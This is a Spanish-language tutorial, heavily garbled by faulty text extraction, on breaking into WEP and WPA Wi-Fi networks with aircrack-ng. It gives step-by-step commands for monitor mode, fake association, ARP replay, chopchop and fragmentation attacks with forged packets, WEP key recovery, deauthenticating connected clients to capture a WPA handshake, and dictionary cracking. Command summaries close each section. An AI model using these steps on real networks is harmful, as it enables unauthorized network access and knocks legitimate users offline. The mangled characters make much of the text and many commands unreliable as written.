ASALTANDO REDES WI-FI WEP / WPA
Aetsu
[email protected]
Esta obra se encuentra bajo la licencia Creative Commons 3.0 Es!a"a#
1
Ci$ra%o WEP To%os &os ata'ues En esta parte del manual explicaré de forma simple como auditar una red wifi con cifrado WEP WEP y obtener su contraseña. Para ello utiliaremos la suite !ircrac"#ng sobre $buntu %.1&'(ubuntu %.1&. El ata)ue se lanar* sobre +arias redes, todas con el consentimiento consentimiento de sus propietarios, por esto omitiré el cambio de direccion -!. Primero +eamos los datos del sistema/ Sistema o!erativo# $buntu %.1& ' (ubuntu %.1& Tar(eta %e re%# 0i200 3045 678&#W5 9chipset atheros: Nom)re %e inter$a* %e re%# wlan;9después mon&: <<<<< =nformaci>n WEP =nformaci>n WEP (Wikipedia): http://es.wikipedia.org/wiki/Wired_Equivalent_Privacy !ntes de empear, empear, por comodidad, comodidad, recomiendo )ue al abrir una terminal nos autentifi)uemos como root 9sudo 9sudo su:, ya )ue todos los comandos )ue introduciremos, o la mayoria, re)uieren )ue seamos root . $na +e dicho esto empecemos/ + !brimos una shell y detenemos la interfa )ue +amos a utiliar con/ ? ifconfig interfa de red< down
en mi caso/ ? ifconfig wlan; down , !hora !hora ponemos nuestra targeta en modo monitor/ ? airmon#ng start interfa de red<
en mi caso/ ? airmon#ng start wlan;
$na +e hemos hemos hecho hecho esto +emos )ue nuestra nuestra targeta targeta pasa a llamarse mon0 y a partir de ahora es el nombre )ue utiliaremos para referirnos a ella. ;
3 Procedemos a escanear redes con airodump#ng, para ello ponemos/ ? airodump#ng interfa de red<
en mi caso/ ? airodump#ng mon&
!hora +amos a intentar entender entender )ue es cada cosa/ SSID/ 4a direccion -! del !P 9el router +ictima:. +icti ma:. PWR / 4a intensidad de señal )ue recibimos del !P. !P. ! diferencia )ue en wifislax wifis lax y en otras distribuciones de seguridad a)uA esta en dbi en dbi en lugar de B. eaons/ Con datos no +alidos para nuestro analisis de la red. Data/ !rchi+os de datos +alidos, estos son los )ue nos interesan. /S/ !)uA +emos a )ue ritmo crecen los ?5ata, es Dtil para +er a )ue +elocidad estamos inyectando. C/ El canal sobre el )ue opera el !P. !P. 1/ elocidad del !P. ## 11 F 6&;.11b '' G7 F 6&;.11g ENC, CIPER , A2T / Estos H campos estan relacionados con la encriptaci>n. ESSID/ El nombre del !P. • •
• • •
• • • •
!brimos una nue+a shell y escogemos un !P/ ? airodump#ng #w archi+o de captura< ##bssid -! del !P< #ccanal del !P +ictima< interfa de red<
en mi caso/ ? airodump#ng #w captura ##bssid aa/bb/cc/dd/ee/ff #cG mon&
H
4 !brimos !brimos una nue+a shell y nos asociamos al !P +ictima/ ? aireplay#ng #1 1& #e nombre del !P< #a -! del !P< #h nuestra -!< interfa de red<
en mi caso/ ? aireplay#ng #1 1& #e W4!2I7H W4!2I7H #a aa/bb/cc/dd/ee/ff #h &&/11/;;/HH/77/GG &&/11/;;/HH/77/GG mon&
ota !/ !/ -ientras no +eamos la carita sonriente #-5 no estamos asociados. ota "/ "/ El +alor 1& es el tiempo en )ue tarda nuestro pc en comprobar el estado de asociaci>n con el !P, !P, puede +ariar entre entr e & y H&, y a +eces, este +alor influye en si s i nos asociamos al !P o no.
Ja tenemos lo b*sico, tenemos nuestra tarjeta de red en modo monitor, monitor, la tenemos capturando pa)uetes y estamos asociados al !P +Actima. ! continuaci>n +eremos los diferentes ata)ues y mas conocidos )ue podemos realiar con c on el aircrac"#ng aircrac"# ng sobre el cifrado WEP. WEP.
Ata'ue + 6 3 Este es el ata)ue mas conocido, conocido, aun)ue generalmente el mas lento. 7 !brimos !brimos una nue+a shell y +amos a intentar reinyectar los ?data/ ? aireplay#ng #H #b -! del !P< #h nuestra -!< interfa de red<
en nuestro caso/ ? aireplay#ng #H #b aa/bb/cc/dd/ee/ff aa/bb/cc/dd/ee/ff #h &&/11/;;/HH/77/GG &&/11/;;/HH/77/GG mon& mon&
7
$na +e hecho esto nos )ueda esperar a )ue empiece el proceso de reinyecci>n, es decir, decir, )ue los !P empiecen a subir, cosa )ue puede tardar desde escasos minutos hasta horas. uando empiecen a subir +eremos como también suben los data de la columna ?5ata de la shell sobre la )ue esta ejecutandose el airodump#ng, adem*s en la columna ?'C la +elocidad a la )ue se est*n inyectando los ?data.
$na +e tengamos unos K&.&&& ?data podemos lanar el aircrac"#ng )ue +eremos después. Podemos esperar a los K&.&&& ?data, aun)ue hay +eces )ue con menos data 9;&.&&&: ya he conseguido obtener el pass del !P, !P, por regla general genera l suelen ser alrededor de K&.&&& o mas.
Ata'ue o 89o! 9o!: El ata)ue chop chop chop no siempre funciona, funciona, pero si funciona funciona es m*s r*pido r*pido )ue el ata)ue 1LH. ; !brimos una shell y lanamos el ata)ue ata)ue chop chop/ ? aireplay#ng #7 #b -! del !P< #h nuestra -!< interfa de red< )ue en mi caso seria/ ? aireplay#ng #7 #b aa/bb/cc/dd/ee/ff aa/bb/cc/dd/ee/ff #h &&/11/;;/HH/77/GG &&/11/;;/HH/77/GG mon& mon& esperamos a )ue encuentre un pa)uete +*lido y nos preguntar*/ #se this packet$ Entonces contestamos %yes&: contestamos %yes&: G
!hora esperamos un un poco y crear* un nue+o archi+o .cap y .cap y un archi+o .'or con con lo )ue aparecer* esto/
< Ejecutamos Ejecutamos tcpdump sobre el archi+o .cap/ .cap/ ? tcpdump #s & #n #e #r archi+o .cap generado antes<
en mi caso/ ? tcpdump #s & #n #e #r replayIsrc#11;%#&&7%;;.cap
Menemos )ue prestar atenci>n a la ip )ue aparece en el texto, en mi caso, 1%;.1K6.1.HH, 1%;.1K6.1.HH, ya )ue la utiliaremos ahora. = Norjamos Norjamos un nue+o pa)uete de datos/ ? pac"etforge#ng #& #a -! del !P< #h nuestra -!< #" ip dentro del rango< #l ip obtenida antes< #y archi+o .xor obtenido antes< #w archi+o )ue reinyectaremos<
en mi caso/ ? pac"etforge#ng #& #a aa/bb/cc/dd/ee/ff #h &&/11/;;/HH/77/GG &&/11/;;/HH/77/GG #" 1%;.1K6.1.;GG 1%;.1K6.1.;GG #l 1%;.1K6.1.HH #y replayIdec#11;%#&&7%;;.xor replayIdec#11;%#&&7%;;.xor #w arp
K
$na +e ponga Wrote Wrote packet to: archivo que reinyectareos* reinyectareos* en mi caso/ Wrote Wrote packet to: arp ya hemos completado este paso. +0 Por Por Dltimo reinyectamos el pa)uete creado/ ? aireplay#ng #; #h nuestra -!< #r archi+o creado en el paso anterior< interfa de red<
en mi caso/ ? aireplay#ng #; #h &&/11/;;/HH/77/GG &&/11/;;/HH/77/GG #r arp mon&
y +eremos como los data crecen mas r*pido 9?'C O 1G8:/
!hora igual )ue con el ata)ue 1LH esperamos a tener los ?data necesarios y lanamos el aircrac"# ng.
8
Ata'ue 4 o 8ata'ue %e $ra(mentai>n: Este ata)ue también es m*s r*pido )ue el ata)ue 1LH, pero como el ata)ue chop chop no chop no siempre funciona. omo aclaraci>n, para este ata)ue cambié de !P, !P, en este caso W4!2I6!. ++ !brimos una shell y ahora lanamos el ata)ue de fragmentaci>n/ ? aireplay#ng #G #b -! del !P< #h nuestra -!< interfa de red< )ue en mi caso seria/ ? aireplay#ng #G #b aa/bb/cc/dd/ee/ff aa/bb/cc/dd/ee/ff #h &&/11/;;/HH/77/GG &&/11/;;/HH/77/GG mon& mon&
ahora esperamos a )ue encuentre un pa)uete +*lido y nos preguntar*/ #se this packet$ Entonces contestamos yesQ/ yesQ/
y aparecer*/
6
$na +e +eamos esto hemos completado este paso. +, !l !l igual )ue con el ata)ue chop chopQ forjamos un nue+o pa)uete de datos/ ? pac"etforge#ng #& #a -! del !P< #h nuestra -!< #" ip dentro del rango< #l ip obtenida antes< #y archi+o .xor obtenido antes< #w archi+o )ue reinyectaremos<
en mi caso/ ? pac"etforge#ng #& #a aa/bb/cc/dd/ee/ff #h &&/11/;;/HH/77/GG &&/11/;;/HH/77/GG #" 1%;.1K6.1.;GG 1%;.1K6.1.;GG #l 1%;.1K6.1.HH #y replayIdec#1;&K#1GGK11.xor replayIdec#1;&K#1GGK11.xor #w arp
$na +e ponga Wrote Wrote packet to: archivo que reinyectareos* reinyectareos*
en mi caso/ Wrote Wrote packet to: arp ya hemos completado este paso. +3 Para Para acabar con este ata)ue hace falta reinyectar como con el ata)ue anterior/ ? aireplay#ng #; #h nuestra -!< #r archi+o creado en el paso anterior< interfa de red<
en mi caso/ ? aireplay#ng #; #h &&/11/;;/HH/77/GG &&/11/;;/HH/77/GG #r arp mon&
%
emos como los ?data suben a un ritmo mas r*pido )ue con el 1LH. Para finaliar con este ata)ue, al igual )ue con los anteriores 9!+, 9 !+, y y chop chop: chop : falta lanar el aircrac"#ng )ue +eremos ahora.
1&
Airra?-n( + $ltimo $ltimo paso, desencriptar el archi+o )ue contiene los ?data +alidos, es decir, el )ue esta capturando desde el principio el airodump#ng. Por tanto abrimos una nue+a shell y/ ? aircrac"#ng archi+o de captura<
en mi caso/ ? aircrac"#ng capturaR.cap
!l final aparecer* la ansiada contraseña del !P, sino nos dir* )ue aDn no tenemos suficientes ?data y tendremos )ue esperar a tener m*s. on esto ya est*n los usos mas tApicos de la suite aircrac"#ng, a partir de a)uA nos )ueda jugar con los comandos de los di+ersos ata)ues, ya )ue ofrecen opciones no comentadas en este tutirial pero )ue pueden ser Dtilies.
RES21EN WEP Ata'ue +63# +5 ,5 35 5
i$on$ i$on$i( i( @inte @inter$a* r$a* %e re% re% %oBn %oBn airmonairmon-n( n( start start @inter$ @inter$a* a* %e re% re% airo%u airo%um!m!-n( n( @int @inter$a er$a** %e re% re% airo%um!-n( airo%um!-n( -B @ar9i @ar9ivo vo %e a!tura --)ssi% --)ssi% @1AC @1AC %e& AP -@ana& -@ana& %e& AP vitima @inter$a* %e re% 45 aire!&a-n( aire!&a-n( -+ +0 -e @nom)r @nom)ree %e& AP -a @1AC @1AC %e& AP -9 @nuestr @nuestra a 1AC @inter$a* %e re% 75 aire!&a-n( aire!&a-n( -3 -) @1AC @1AC %e& AP -9 @nuestra @nuestra 1AC 1AC @inter$a* @inter$a* %e re% ;5 airra airra?-n ?-n( ( @ar9 @ar9ivo ivo %e a!tu a!tura ra
11
Ata'ue 9o! 9o!# +5 ,5 35 5 45 75 ;5 <5
i$on$ i$on$i( i( @inte @inter$a* r$a* %e re% re% %oBn %oBn airmonairmon-n( n( start start @inter$ @inter$a* a* %e re% re% airo%u airo%um!m!-n( n( @int @inter$a er$a** %e re% re% airo%um!-n( airo%um!-n( -B @ar9i @ar9ivo vo %e a!tura --)ssi% --)ssi% @1AC @1AC %e& AP -@ana& -@ana& %e& AP vitima @inter$a* %e re% aire!&a-n( aire!&a-n( -+ +0 -e @nom)r @nom)ree %e& AP -a @1AC @1AC %e& AP -9 @nuestr @nuestra a 1AC @inter$a* %e re% aire!&a-n( aire!&a-n( - -) @1AC @1AC %e& AP -9 @nuestra @nuestra 1AC 1AC @inter$a* @inter$a* %e re% re% t!%um! t!%um! -s -s 0 -n -e -r @ar9ivo @ar9ivo .a! .a! (enera%o (enera%o antes antes !a?et$or(e-n !a?et$or(e-n( ( -0 -a @1AC @1AC %e& AP -9 @nuestra @nuestra 1AC -? @i! %entro %entro %e& ran(o ran(o -& @i! o)teni%a antes - @ar9ivo .or o)teni%o antes -B @ar9ivo 'ue reinetaremos
=5 aire!&a-n( aire!&a-n( -, -9 @nuestra @nuestra 1AC 1AC -r @ar9ivo @ar9ivo rea%o rea%o en e& !aso anterior anterior @inter$a* @inter$a* %e re% +05 airra?-n( airra?-n( @ar9ivo %e a!tura
Ata'ue %e $ra(mentai>n# +5 ,5 35 5 45 75 ;5 <5 =5
i$on$ i$on$i( i( @inte @inter$a* r$a* %e re% re% %oBn %oBn airmonairmon-n( n( start start @inter$ @inter$a* a* %e re% re% airo%u airo%um!m!-n( n( @int @inter$a er$a** %e re% re% airo%um!-n( airo%um!-n( -B @ar9i @ar9ivo vo %e a!tura --)ssi% --)ssi% @1AC @1AC %e& AP -@ana& -@ana& %e& AP vitima @inter$a* %e re% aire!&a-n( aire!&a-n( -+ +0 -e @nom)r @nom)ree %e& AP -a @1AC @1AC %e& AP -9 @nuestr @nuestra a 1AC @inter$a* %e re% aire!&a-n( aire!&a-n( -4 -) @1AC @1AC %e& AP -9 @nuestra @nuestra 1AC 1AC @inter$a* @inter$a* %e re% re% !a?et$or(e-n !a?et$or(e-n( ( -0 -a @1AC @1AC %e& AP -9 @nuestra @nuestra 1AC -? @i! %entro %entro %e& ran(o ran(o -& @i! o)teni%a antes - @ar9ivo .or o)teni%o antes -B @ar9ivo 'ue reinetaremos aire!&a-n( aire!&a-n( -, -9 @nuestra @nuestra 1AC 1AC -r @ar9ivo @ar9ivo rea%o rea%o en e& !aso anterior anterior @inter$a* @inter$a* %e re% airra airra?-n ?-n( ( @ar9 @ar9ivo ivo %e a!tu a!tura ra
1;
ASALTANDO REDES WPA CON AIRCRAC-N !hora +oy a mostrar como probar la 9in:seguridad de las redes WP!, WP!, y para ello utiliare la suite !ircrac"#ng. <<<<< =nformaci>n WP =nformaci>n WP- (Wikipedia): (Wikipedi a): http/''es.wi"ipedia.org'wi"i'Wi#NiIProtectedI!ccess
Para empear con esto +amos +amos a mostrar el entorno en el )ue trabajaremos/ aa#))##%%#ee#$$ -! del router 9SCC=5:/ ++#,,#33##44#77 -! de un cliente asociado a sociado al !P/ vo%a$oneF;EF 2ombre de la red 9ECC=5:/ +, anal del !P/ N2/LinuGWi$is&a 3.+5 Cistema operati+o utiliado/ rt,4;+$ hipset de la tarjeta9atacante:/ raus)0 2ombre de la interfa de red/ • • • • • • •
Empearemos este tutorial asumiendo )ue )ue ya tenemos la tarjeta en modo modo monitor y )ue hemos tomado las precauciones de cambiar nuestra mac. Sueno a trabajar/ + 4o 4o primero )ue tenemos )ue hacer es )usar e& AP o)Hetivo con airodump#ng, para ello abrimos una shell y escribimos/
airodump#ng #w morsa ##bssid aa/bb/cc/dd/ee/ff #c1; rausb& donde/ • • •
• •
airo%um!-n(/ programa para escanear redes wi#fi. -B morsa/ con -B elegimos el nombre del archi+o de captura, en este caso, orsa. orsa. --)ssi% aa/bb/cc/dd/ee/ff/ en ##)ssi% ponemos la -! del !P, !P, en este es te caso, aa/bb/cc/dd/ee/ff . -1;/ con - seleccionamos el canal por el )ue opera el !P, !P, en este caso 1;. raus)0/ nombre con el )ue wifislax reconoce a la tarjeta de red, en este caso, raus)0.
1H
, 4o 4o siguiente sera o)tener e& 9an%s9a?e, para ello o bien esperamos a )ue un cliente se conecte, o bien desasociamos desas ociamos a un cliente ya conectado al !P, !P, con lo )ue le foraremos a +ol+er a conectarse y obtendremos el buscado handsha"e. omo no )ueremos esperar, +amos +amos a desasociar a alguien conectado a la red, para hacerlo abrimos una terminal y/
aireplay#ng #& ;& #a aa/bb/cc/dd/ee/ff #c 11/;;/HH/77/GG/KK rausb& donde/ •
•
•
• •
•
aire!&a-n(/ Esta aplicaci>n la utiliaremos para realiar el ata)ue & con el )ue desasociamos a un cliente c liente asociado al !P +Actima. -0/ Esto implica )ue utiliamos el ata)ue 0 con el fin de desconectar a un usuario de el !P objeti+o. ,0/ El numero de pa)uetes )ue mandaremos a la tarjeta asociada con el fin de conseguir )ue se caiga de la red, en este caso ,0, si ponemos & no parar*n de lanarse pa)uetes hasta )ue nosotros interrumpamos la ejecuci>n del programa 9M4 L en la shell o cerrando la terminal:. -a aa/bb/cc/dd/ee/ff/ on -a seleccionamos la -! del !P objeti+o. - 11/;;/HH/77/GG/KK/ 11/;;/HH/77/GG/KK/ on - seleccionamos la -! de un cliente asociado al !P al )ue en+iaremos los pa)uetes con el fin de conseguir )ue se reconecte al !P y obtener el handsha"e. raus)0/ nombre con el )ue wifislax reconoce a la tarjeta de red, en este caso, raus)0.
3 $na +e el cliente se caiga y se +uel+a a conectar, si hemos obtenido el handsha"e aparecer* en la parte superior derecha de la +entana del airodump#ng/
17
omo +emos en la imagen pone WP! WP! handsha"e handsha"e junto con la mac del !P, !P, en el caso del ejemplo pondrAa/ WPA 9an%s9a?e# aa/bb/cc/dd/ee/ff 5e todas formas si )ueremos comprobar si hemos obtenido o no el handsha"e, podemos poner poner en una shell/ aircrac"#ng morsa#&1.cap donde/ • •
airra?-n(/ Programa )ue utiliaremos para obtener la contraseña. morsa-0+.a!/ El archi+o donde hemos guardado la captura de datos.
Entonces si hemos hemos obtenido un handsha"e +alido aparecer*/
Sueno Sueno para acabar esto solo tenemos )ue tener, 12CISI1A S2ERTE , para )ue la cla+e del !P este en nuestro diccionario. Para este ejemplo, utiliare el diccionario )ue se encuentra en $buntu 9supongo )ue otras distros también lo tendr*n, pero no lo he comprobado: añadiéndole mi cla+e por la mitad ya )ue no aparecAa en este. Para encontrarlo en $buntu hay )ue ir a/ /et/%itionaries-ommon y dentro de esta carpeta encontraremos un archi+o llamado Bor%s. $na +e escogido nuestro nuestro diccionario solo )ueda lanar el ata)ue. Este ata)ue durar* mas mas o menos en funci>n del tamaño del diccionario.
aircrac"#ng #w 'root'5es"top'words morsa#&1.cap donde/ • •
•
airra?-n(/ Programa )ue utiliaremos para obtener la contraseña. -B 'root'5es"top'words/ on -B seleccionamos el diccionario )ue utiliaremos, en mi caso se encuentra en el directorio 'root'5es"top y se llama words. words. morsa-0+.a!/ El archi+o donde hemos guardado la captura de datos.
1G
$na +e iniciado el proceso de crac"eo de la contraseña contraseña solo nos )ueda esperar y tener suerte de )ue la contraseña del !P se encuentre en nuestro diccionario como hemos dicho antes.
En mi caso la cla+e era E2CRCNJK y tard> un par de minutos en encontrarla. on esto acabo este tutorial sobre como obtener la contraseña de !P con este cifrado, resaltando )ue lo mas importante hoy por hoy, hoy, para obtener el acceso a una red wi#fi protegida con WP!, WP!, es )ue la contraseña este en uno de nuestros diccionarios, sino no podremos acceder a esta y el trabajo habr* sido en +ano. $n saludo.
1K
RES21EN WPA Ata'ue a re%es WPA# +5 airo%um!-n( airo%um!-n( -B @ar9i @ar9ivo vo %e a!tura --)ssi% --)ssi% @1AC @1AC %e& AP -@ana& -@ana& %e& AP vitima @inter$a* %e re% ,5 aire!&a-n( aire!&a-n( -0 ,0 -a @1AC @1AC %e& AP - @1AC @1AC tarHeta asoia%a asoia%a a& AP @inter$a* @inter$a* %e re% 35 airra?-n airra?-n( ( -B @%iionario @%iionario @ar9ivo @ar9ivo %e %e a!tura a!tura
REFERENCIAS# Suite Airra?-n(# http/''www.aircrac"#ng.org'
ESCRITO PARA# Artea?# http/''artehac".net' CP# http/''foro.portalhac"er.net'
by Aetsu
[email protected]
Esta obra se encuentra bajo la licencia Creative Commons 3.0 - Es!a"a
18
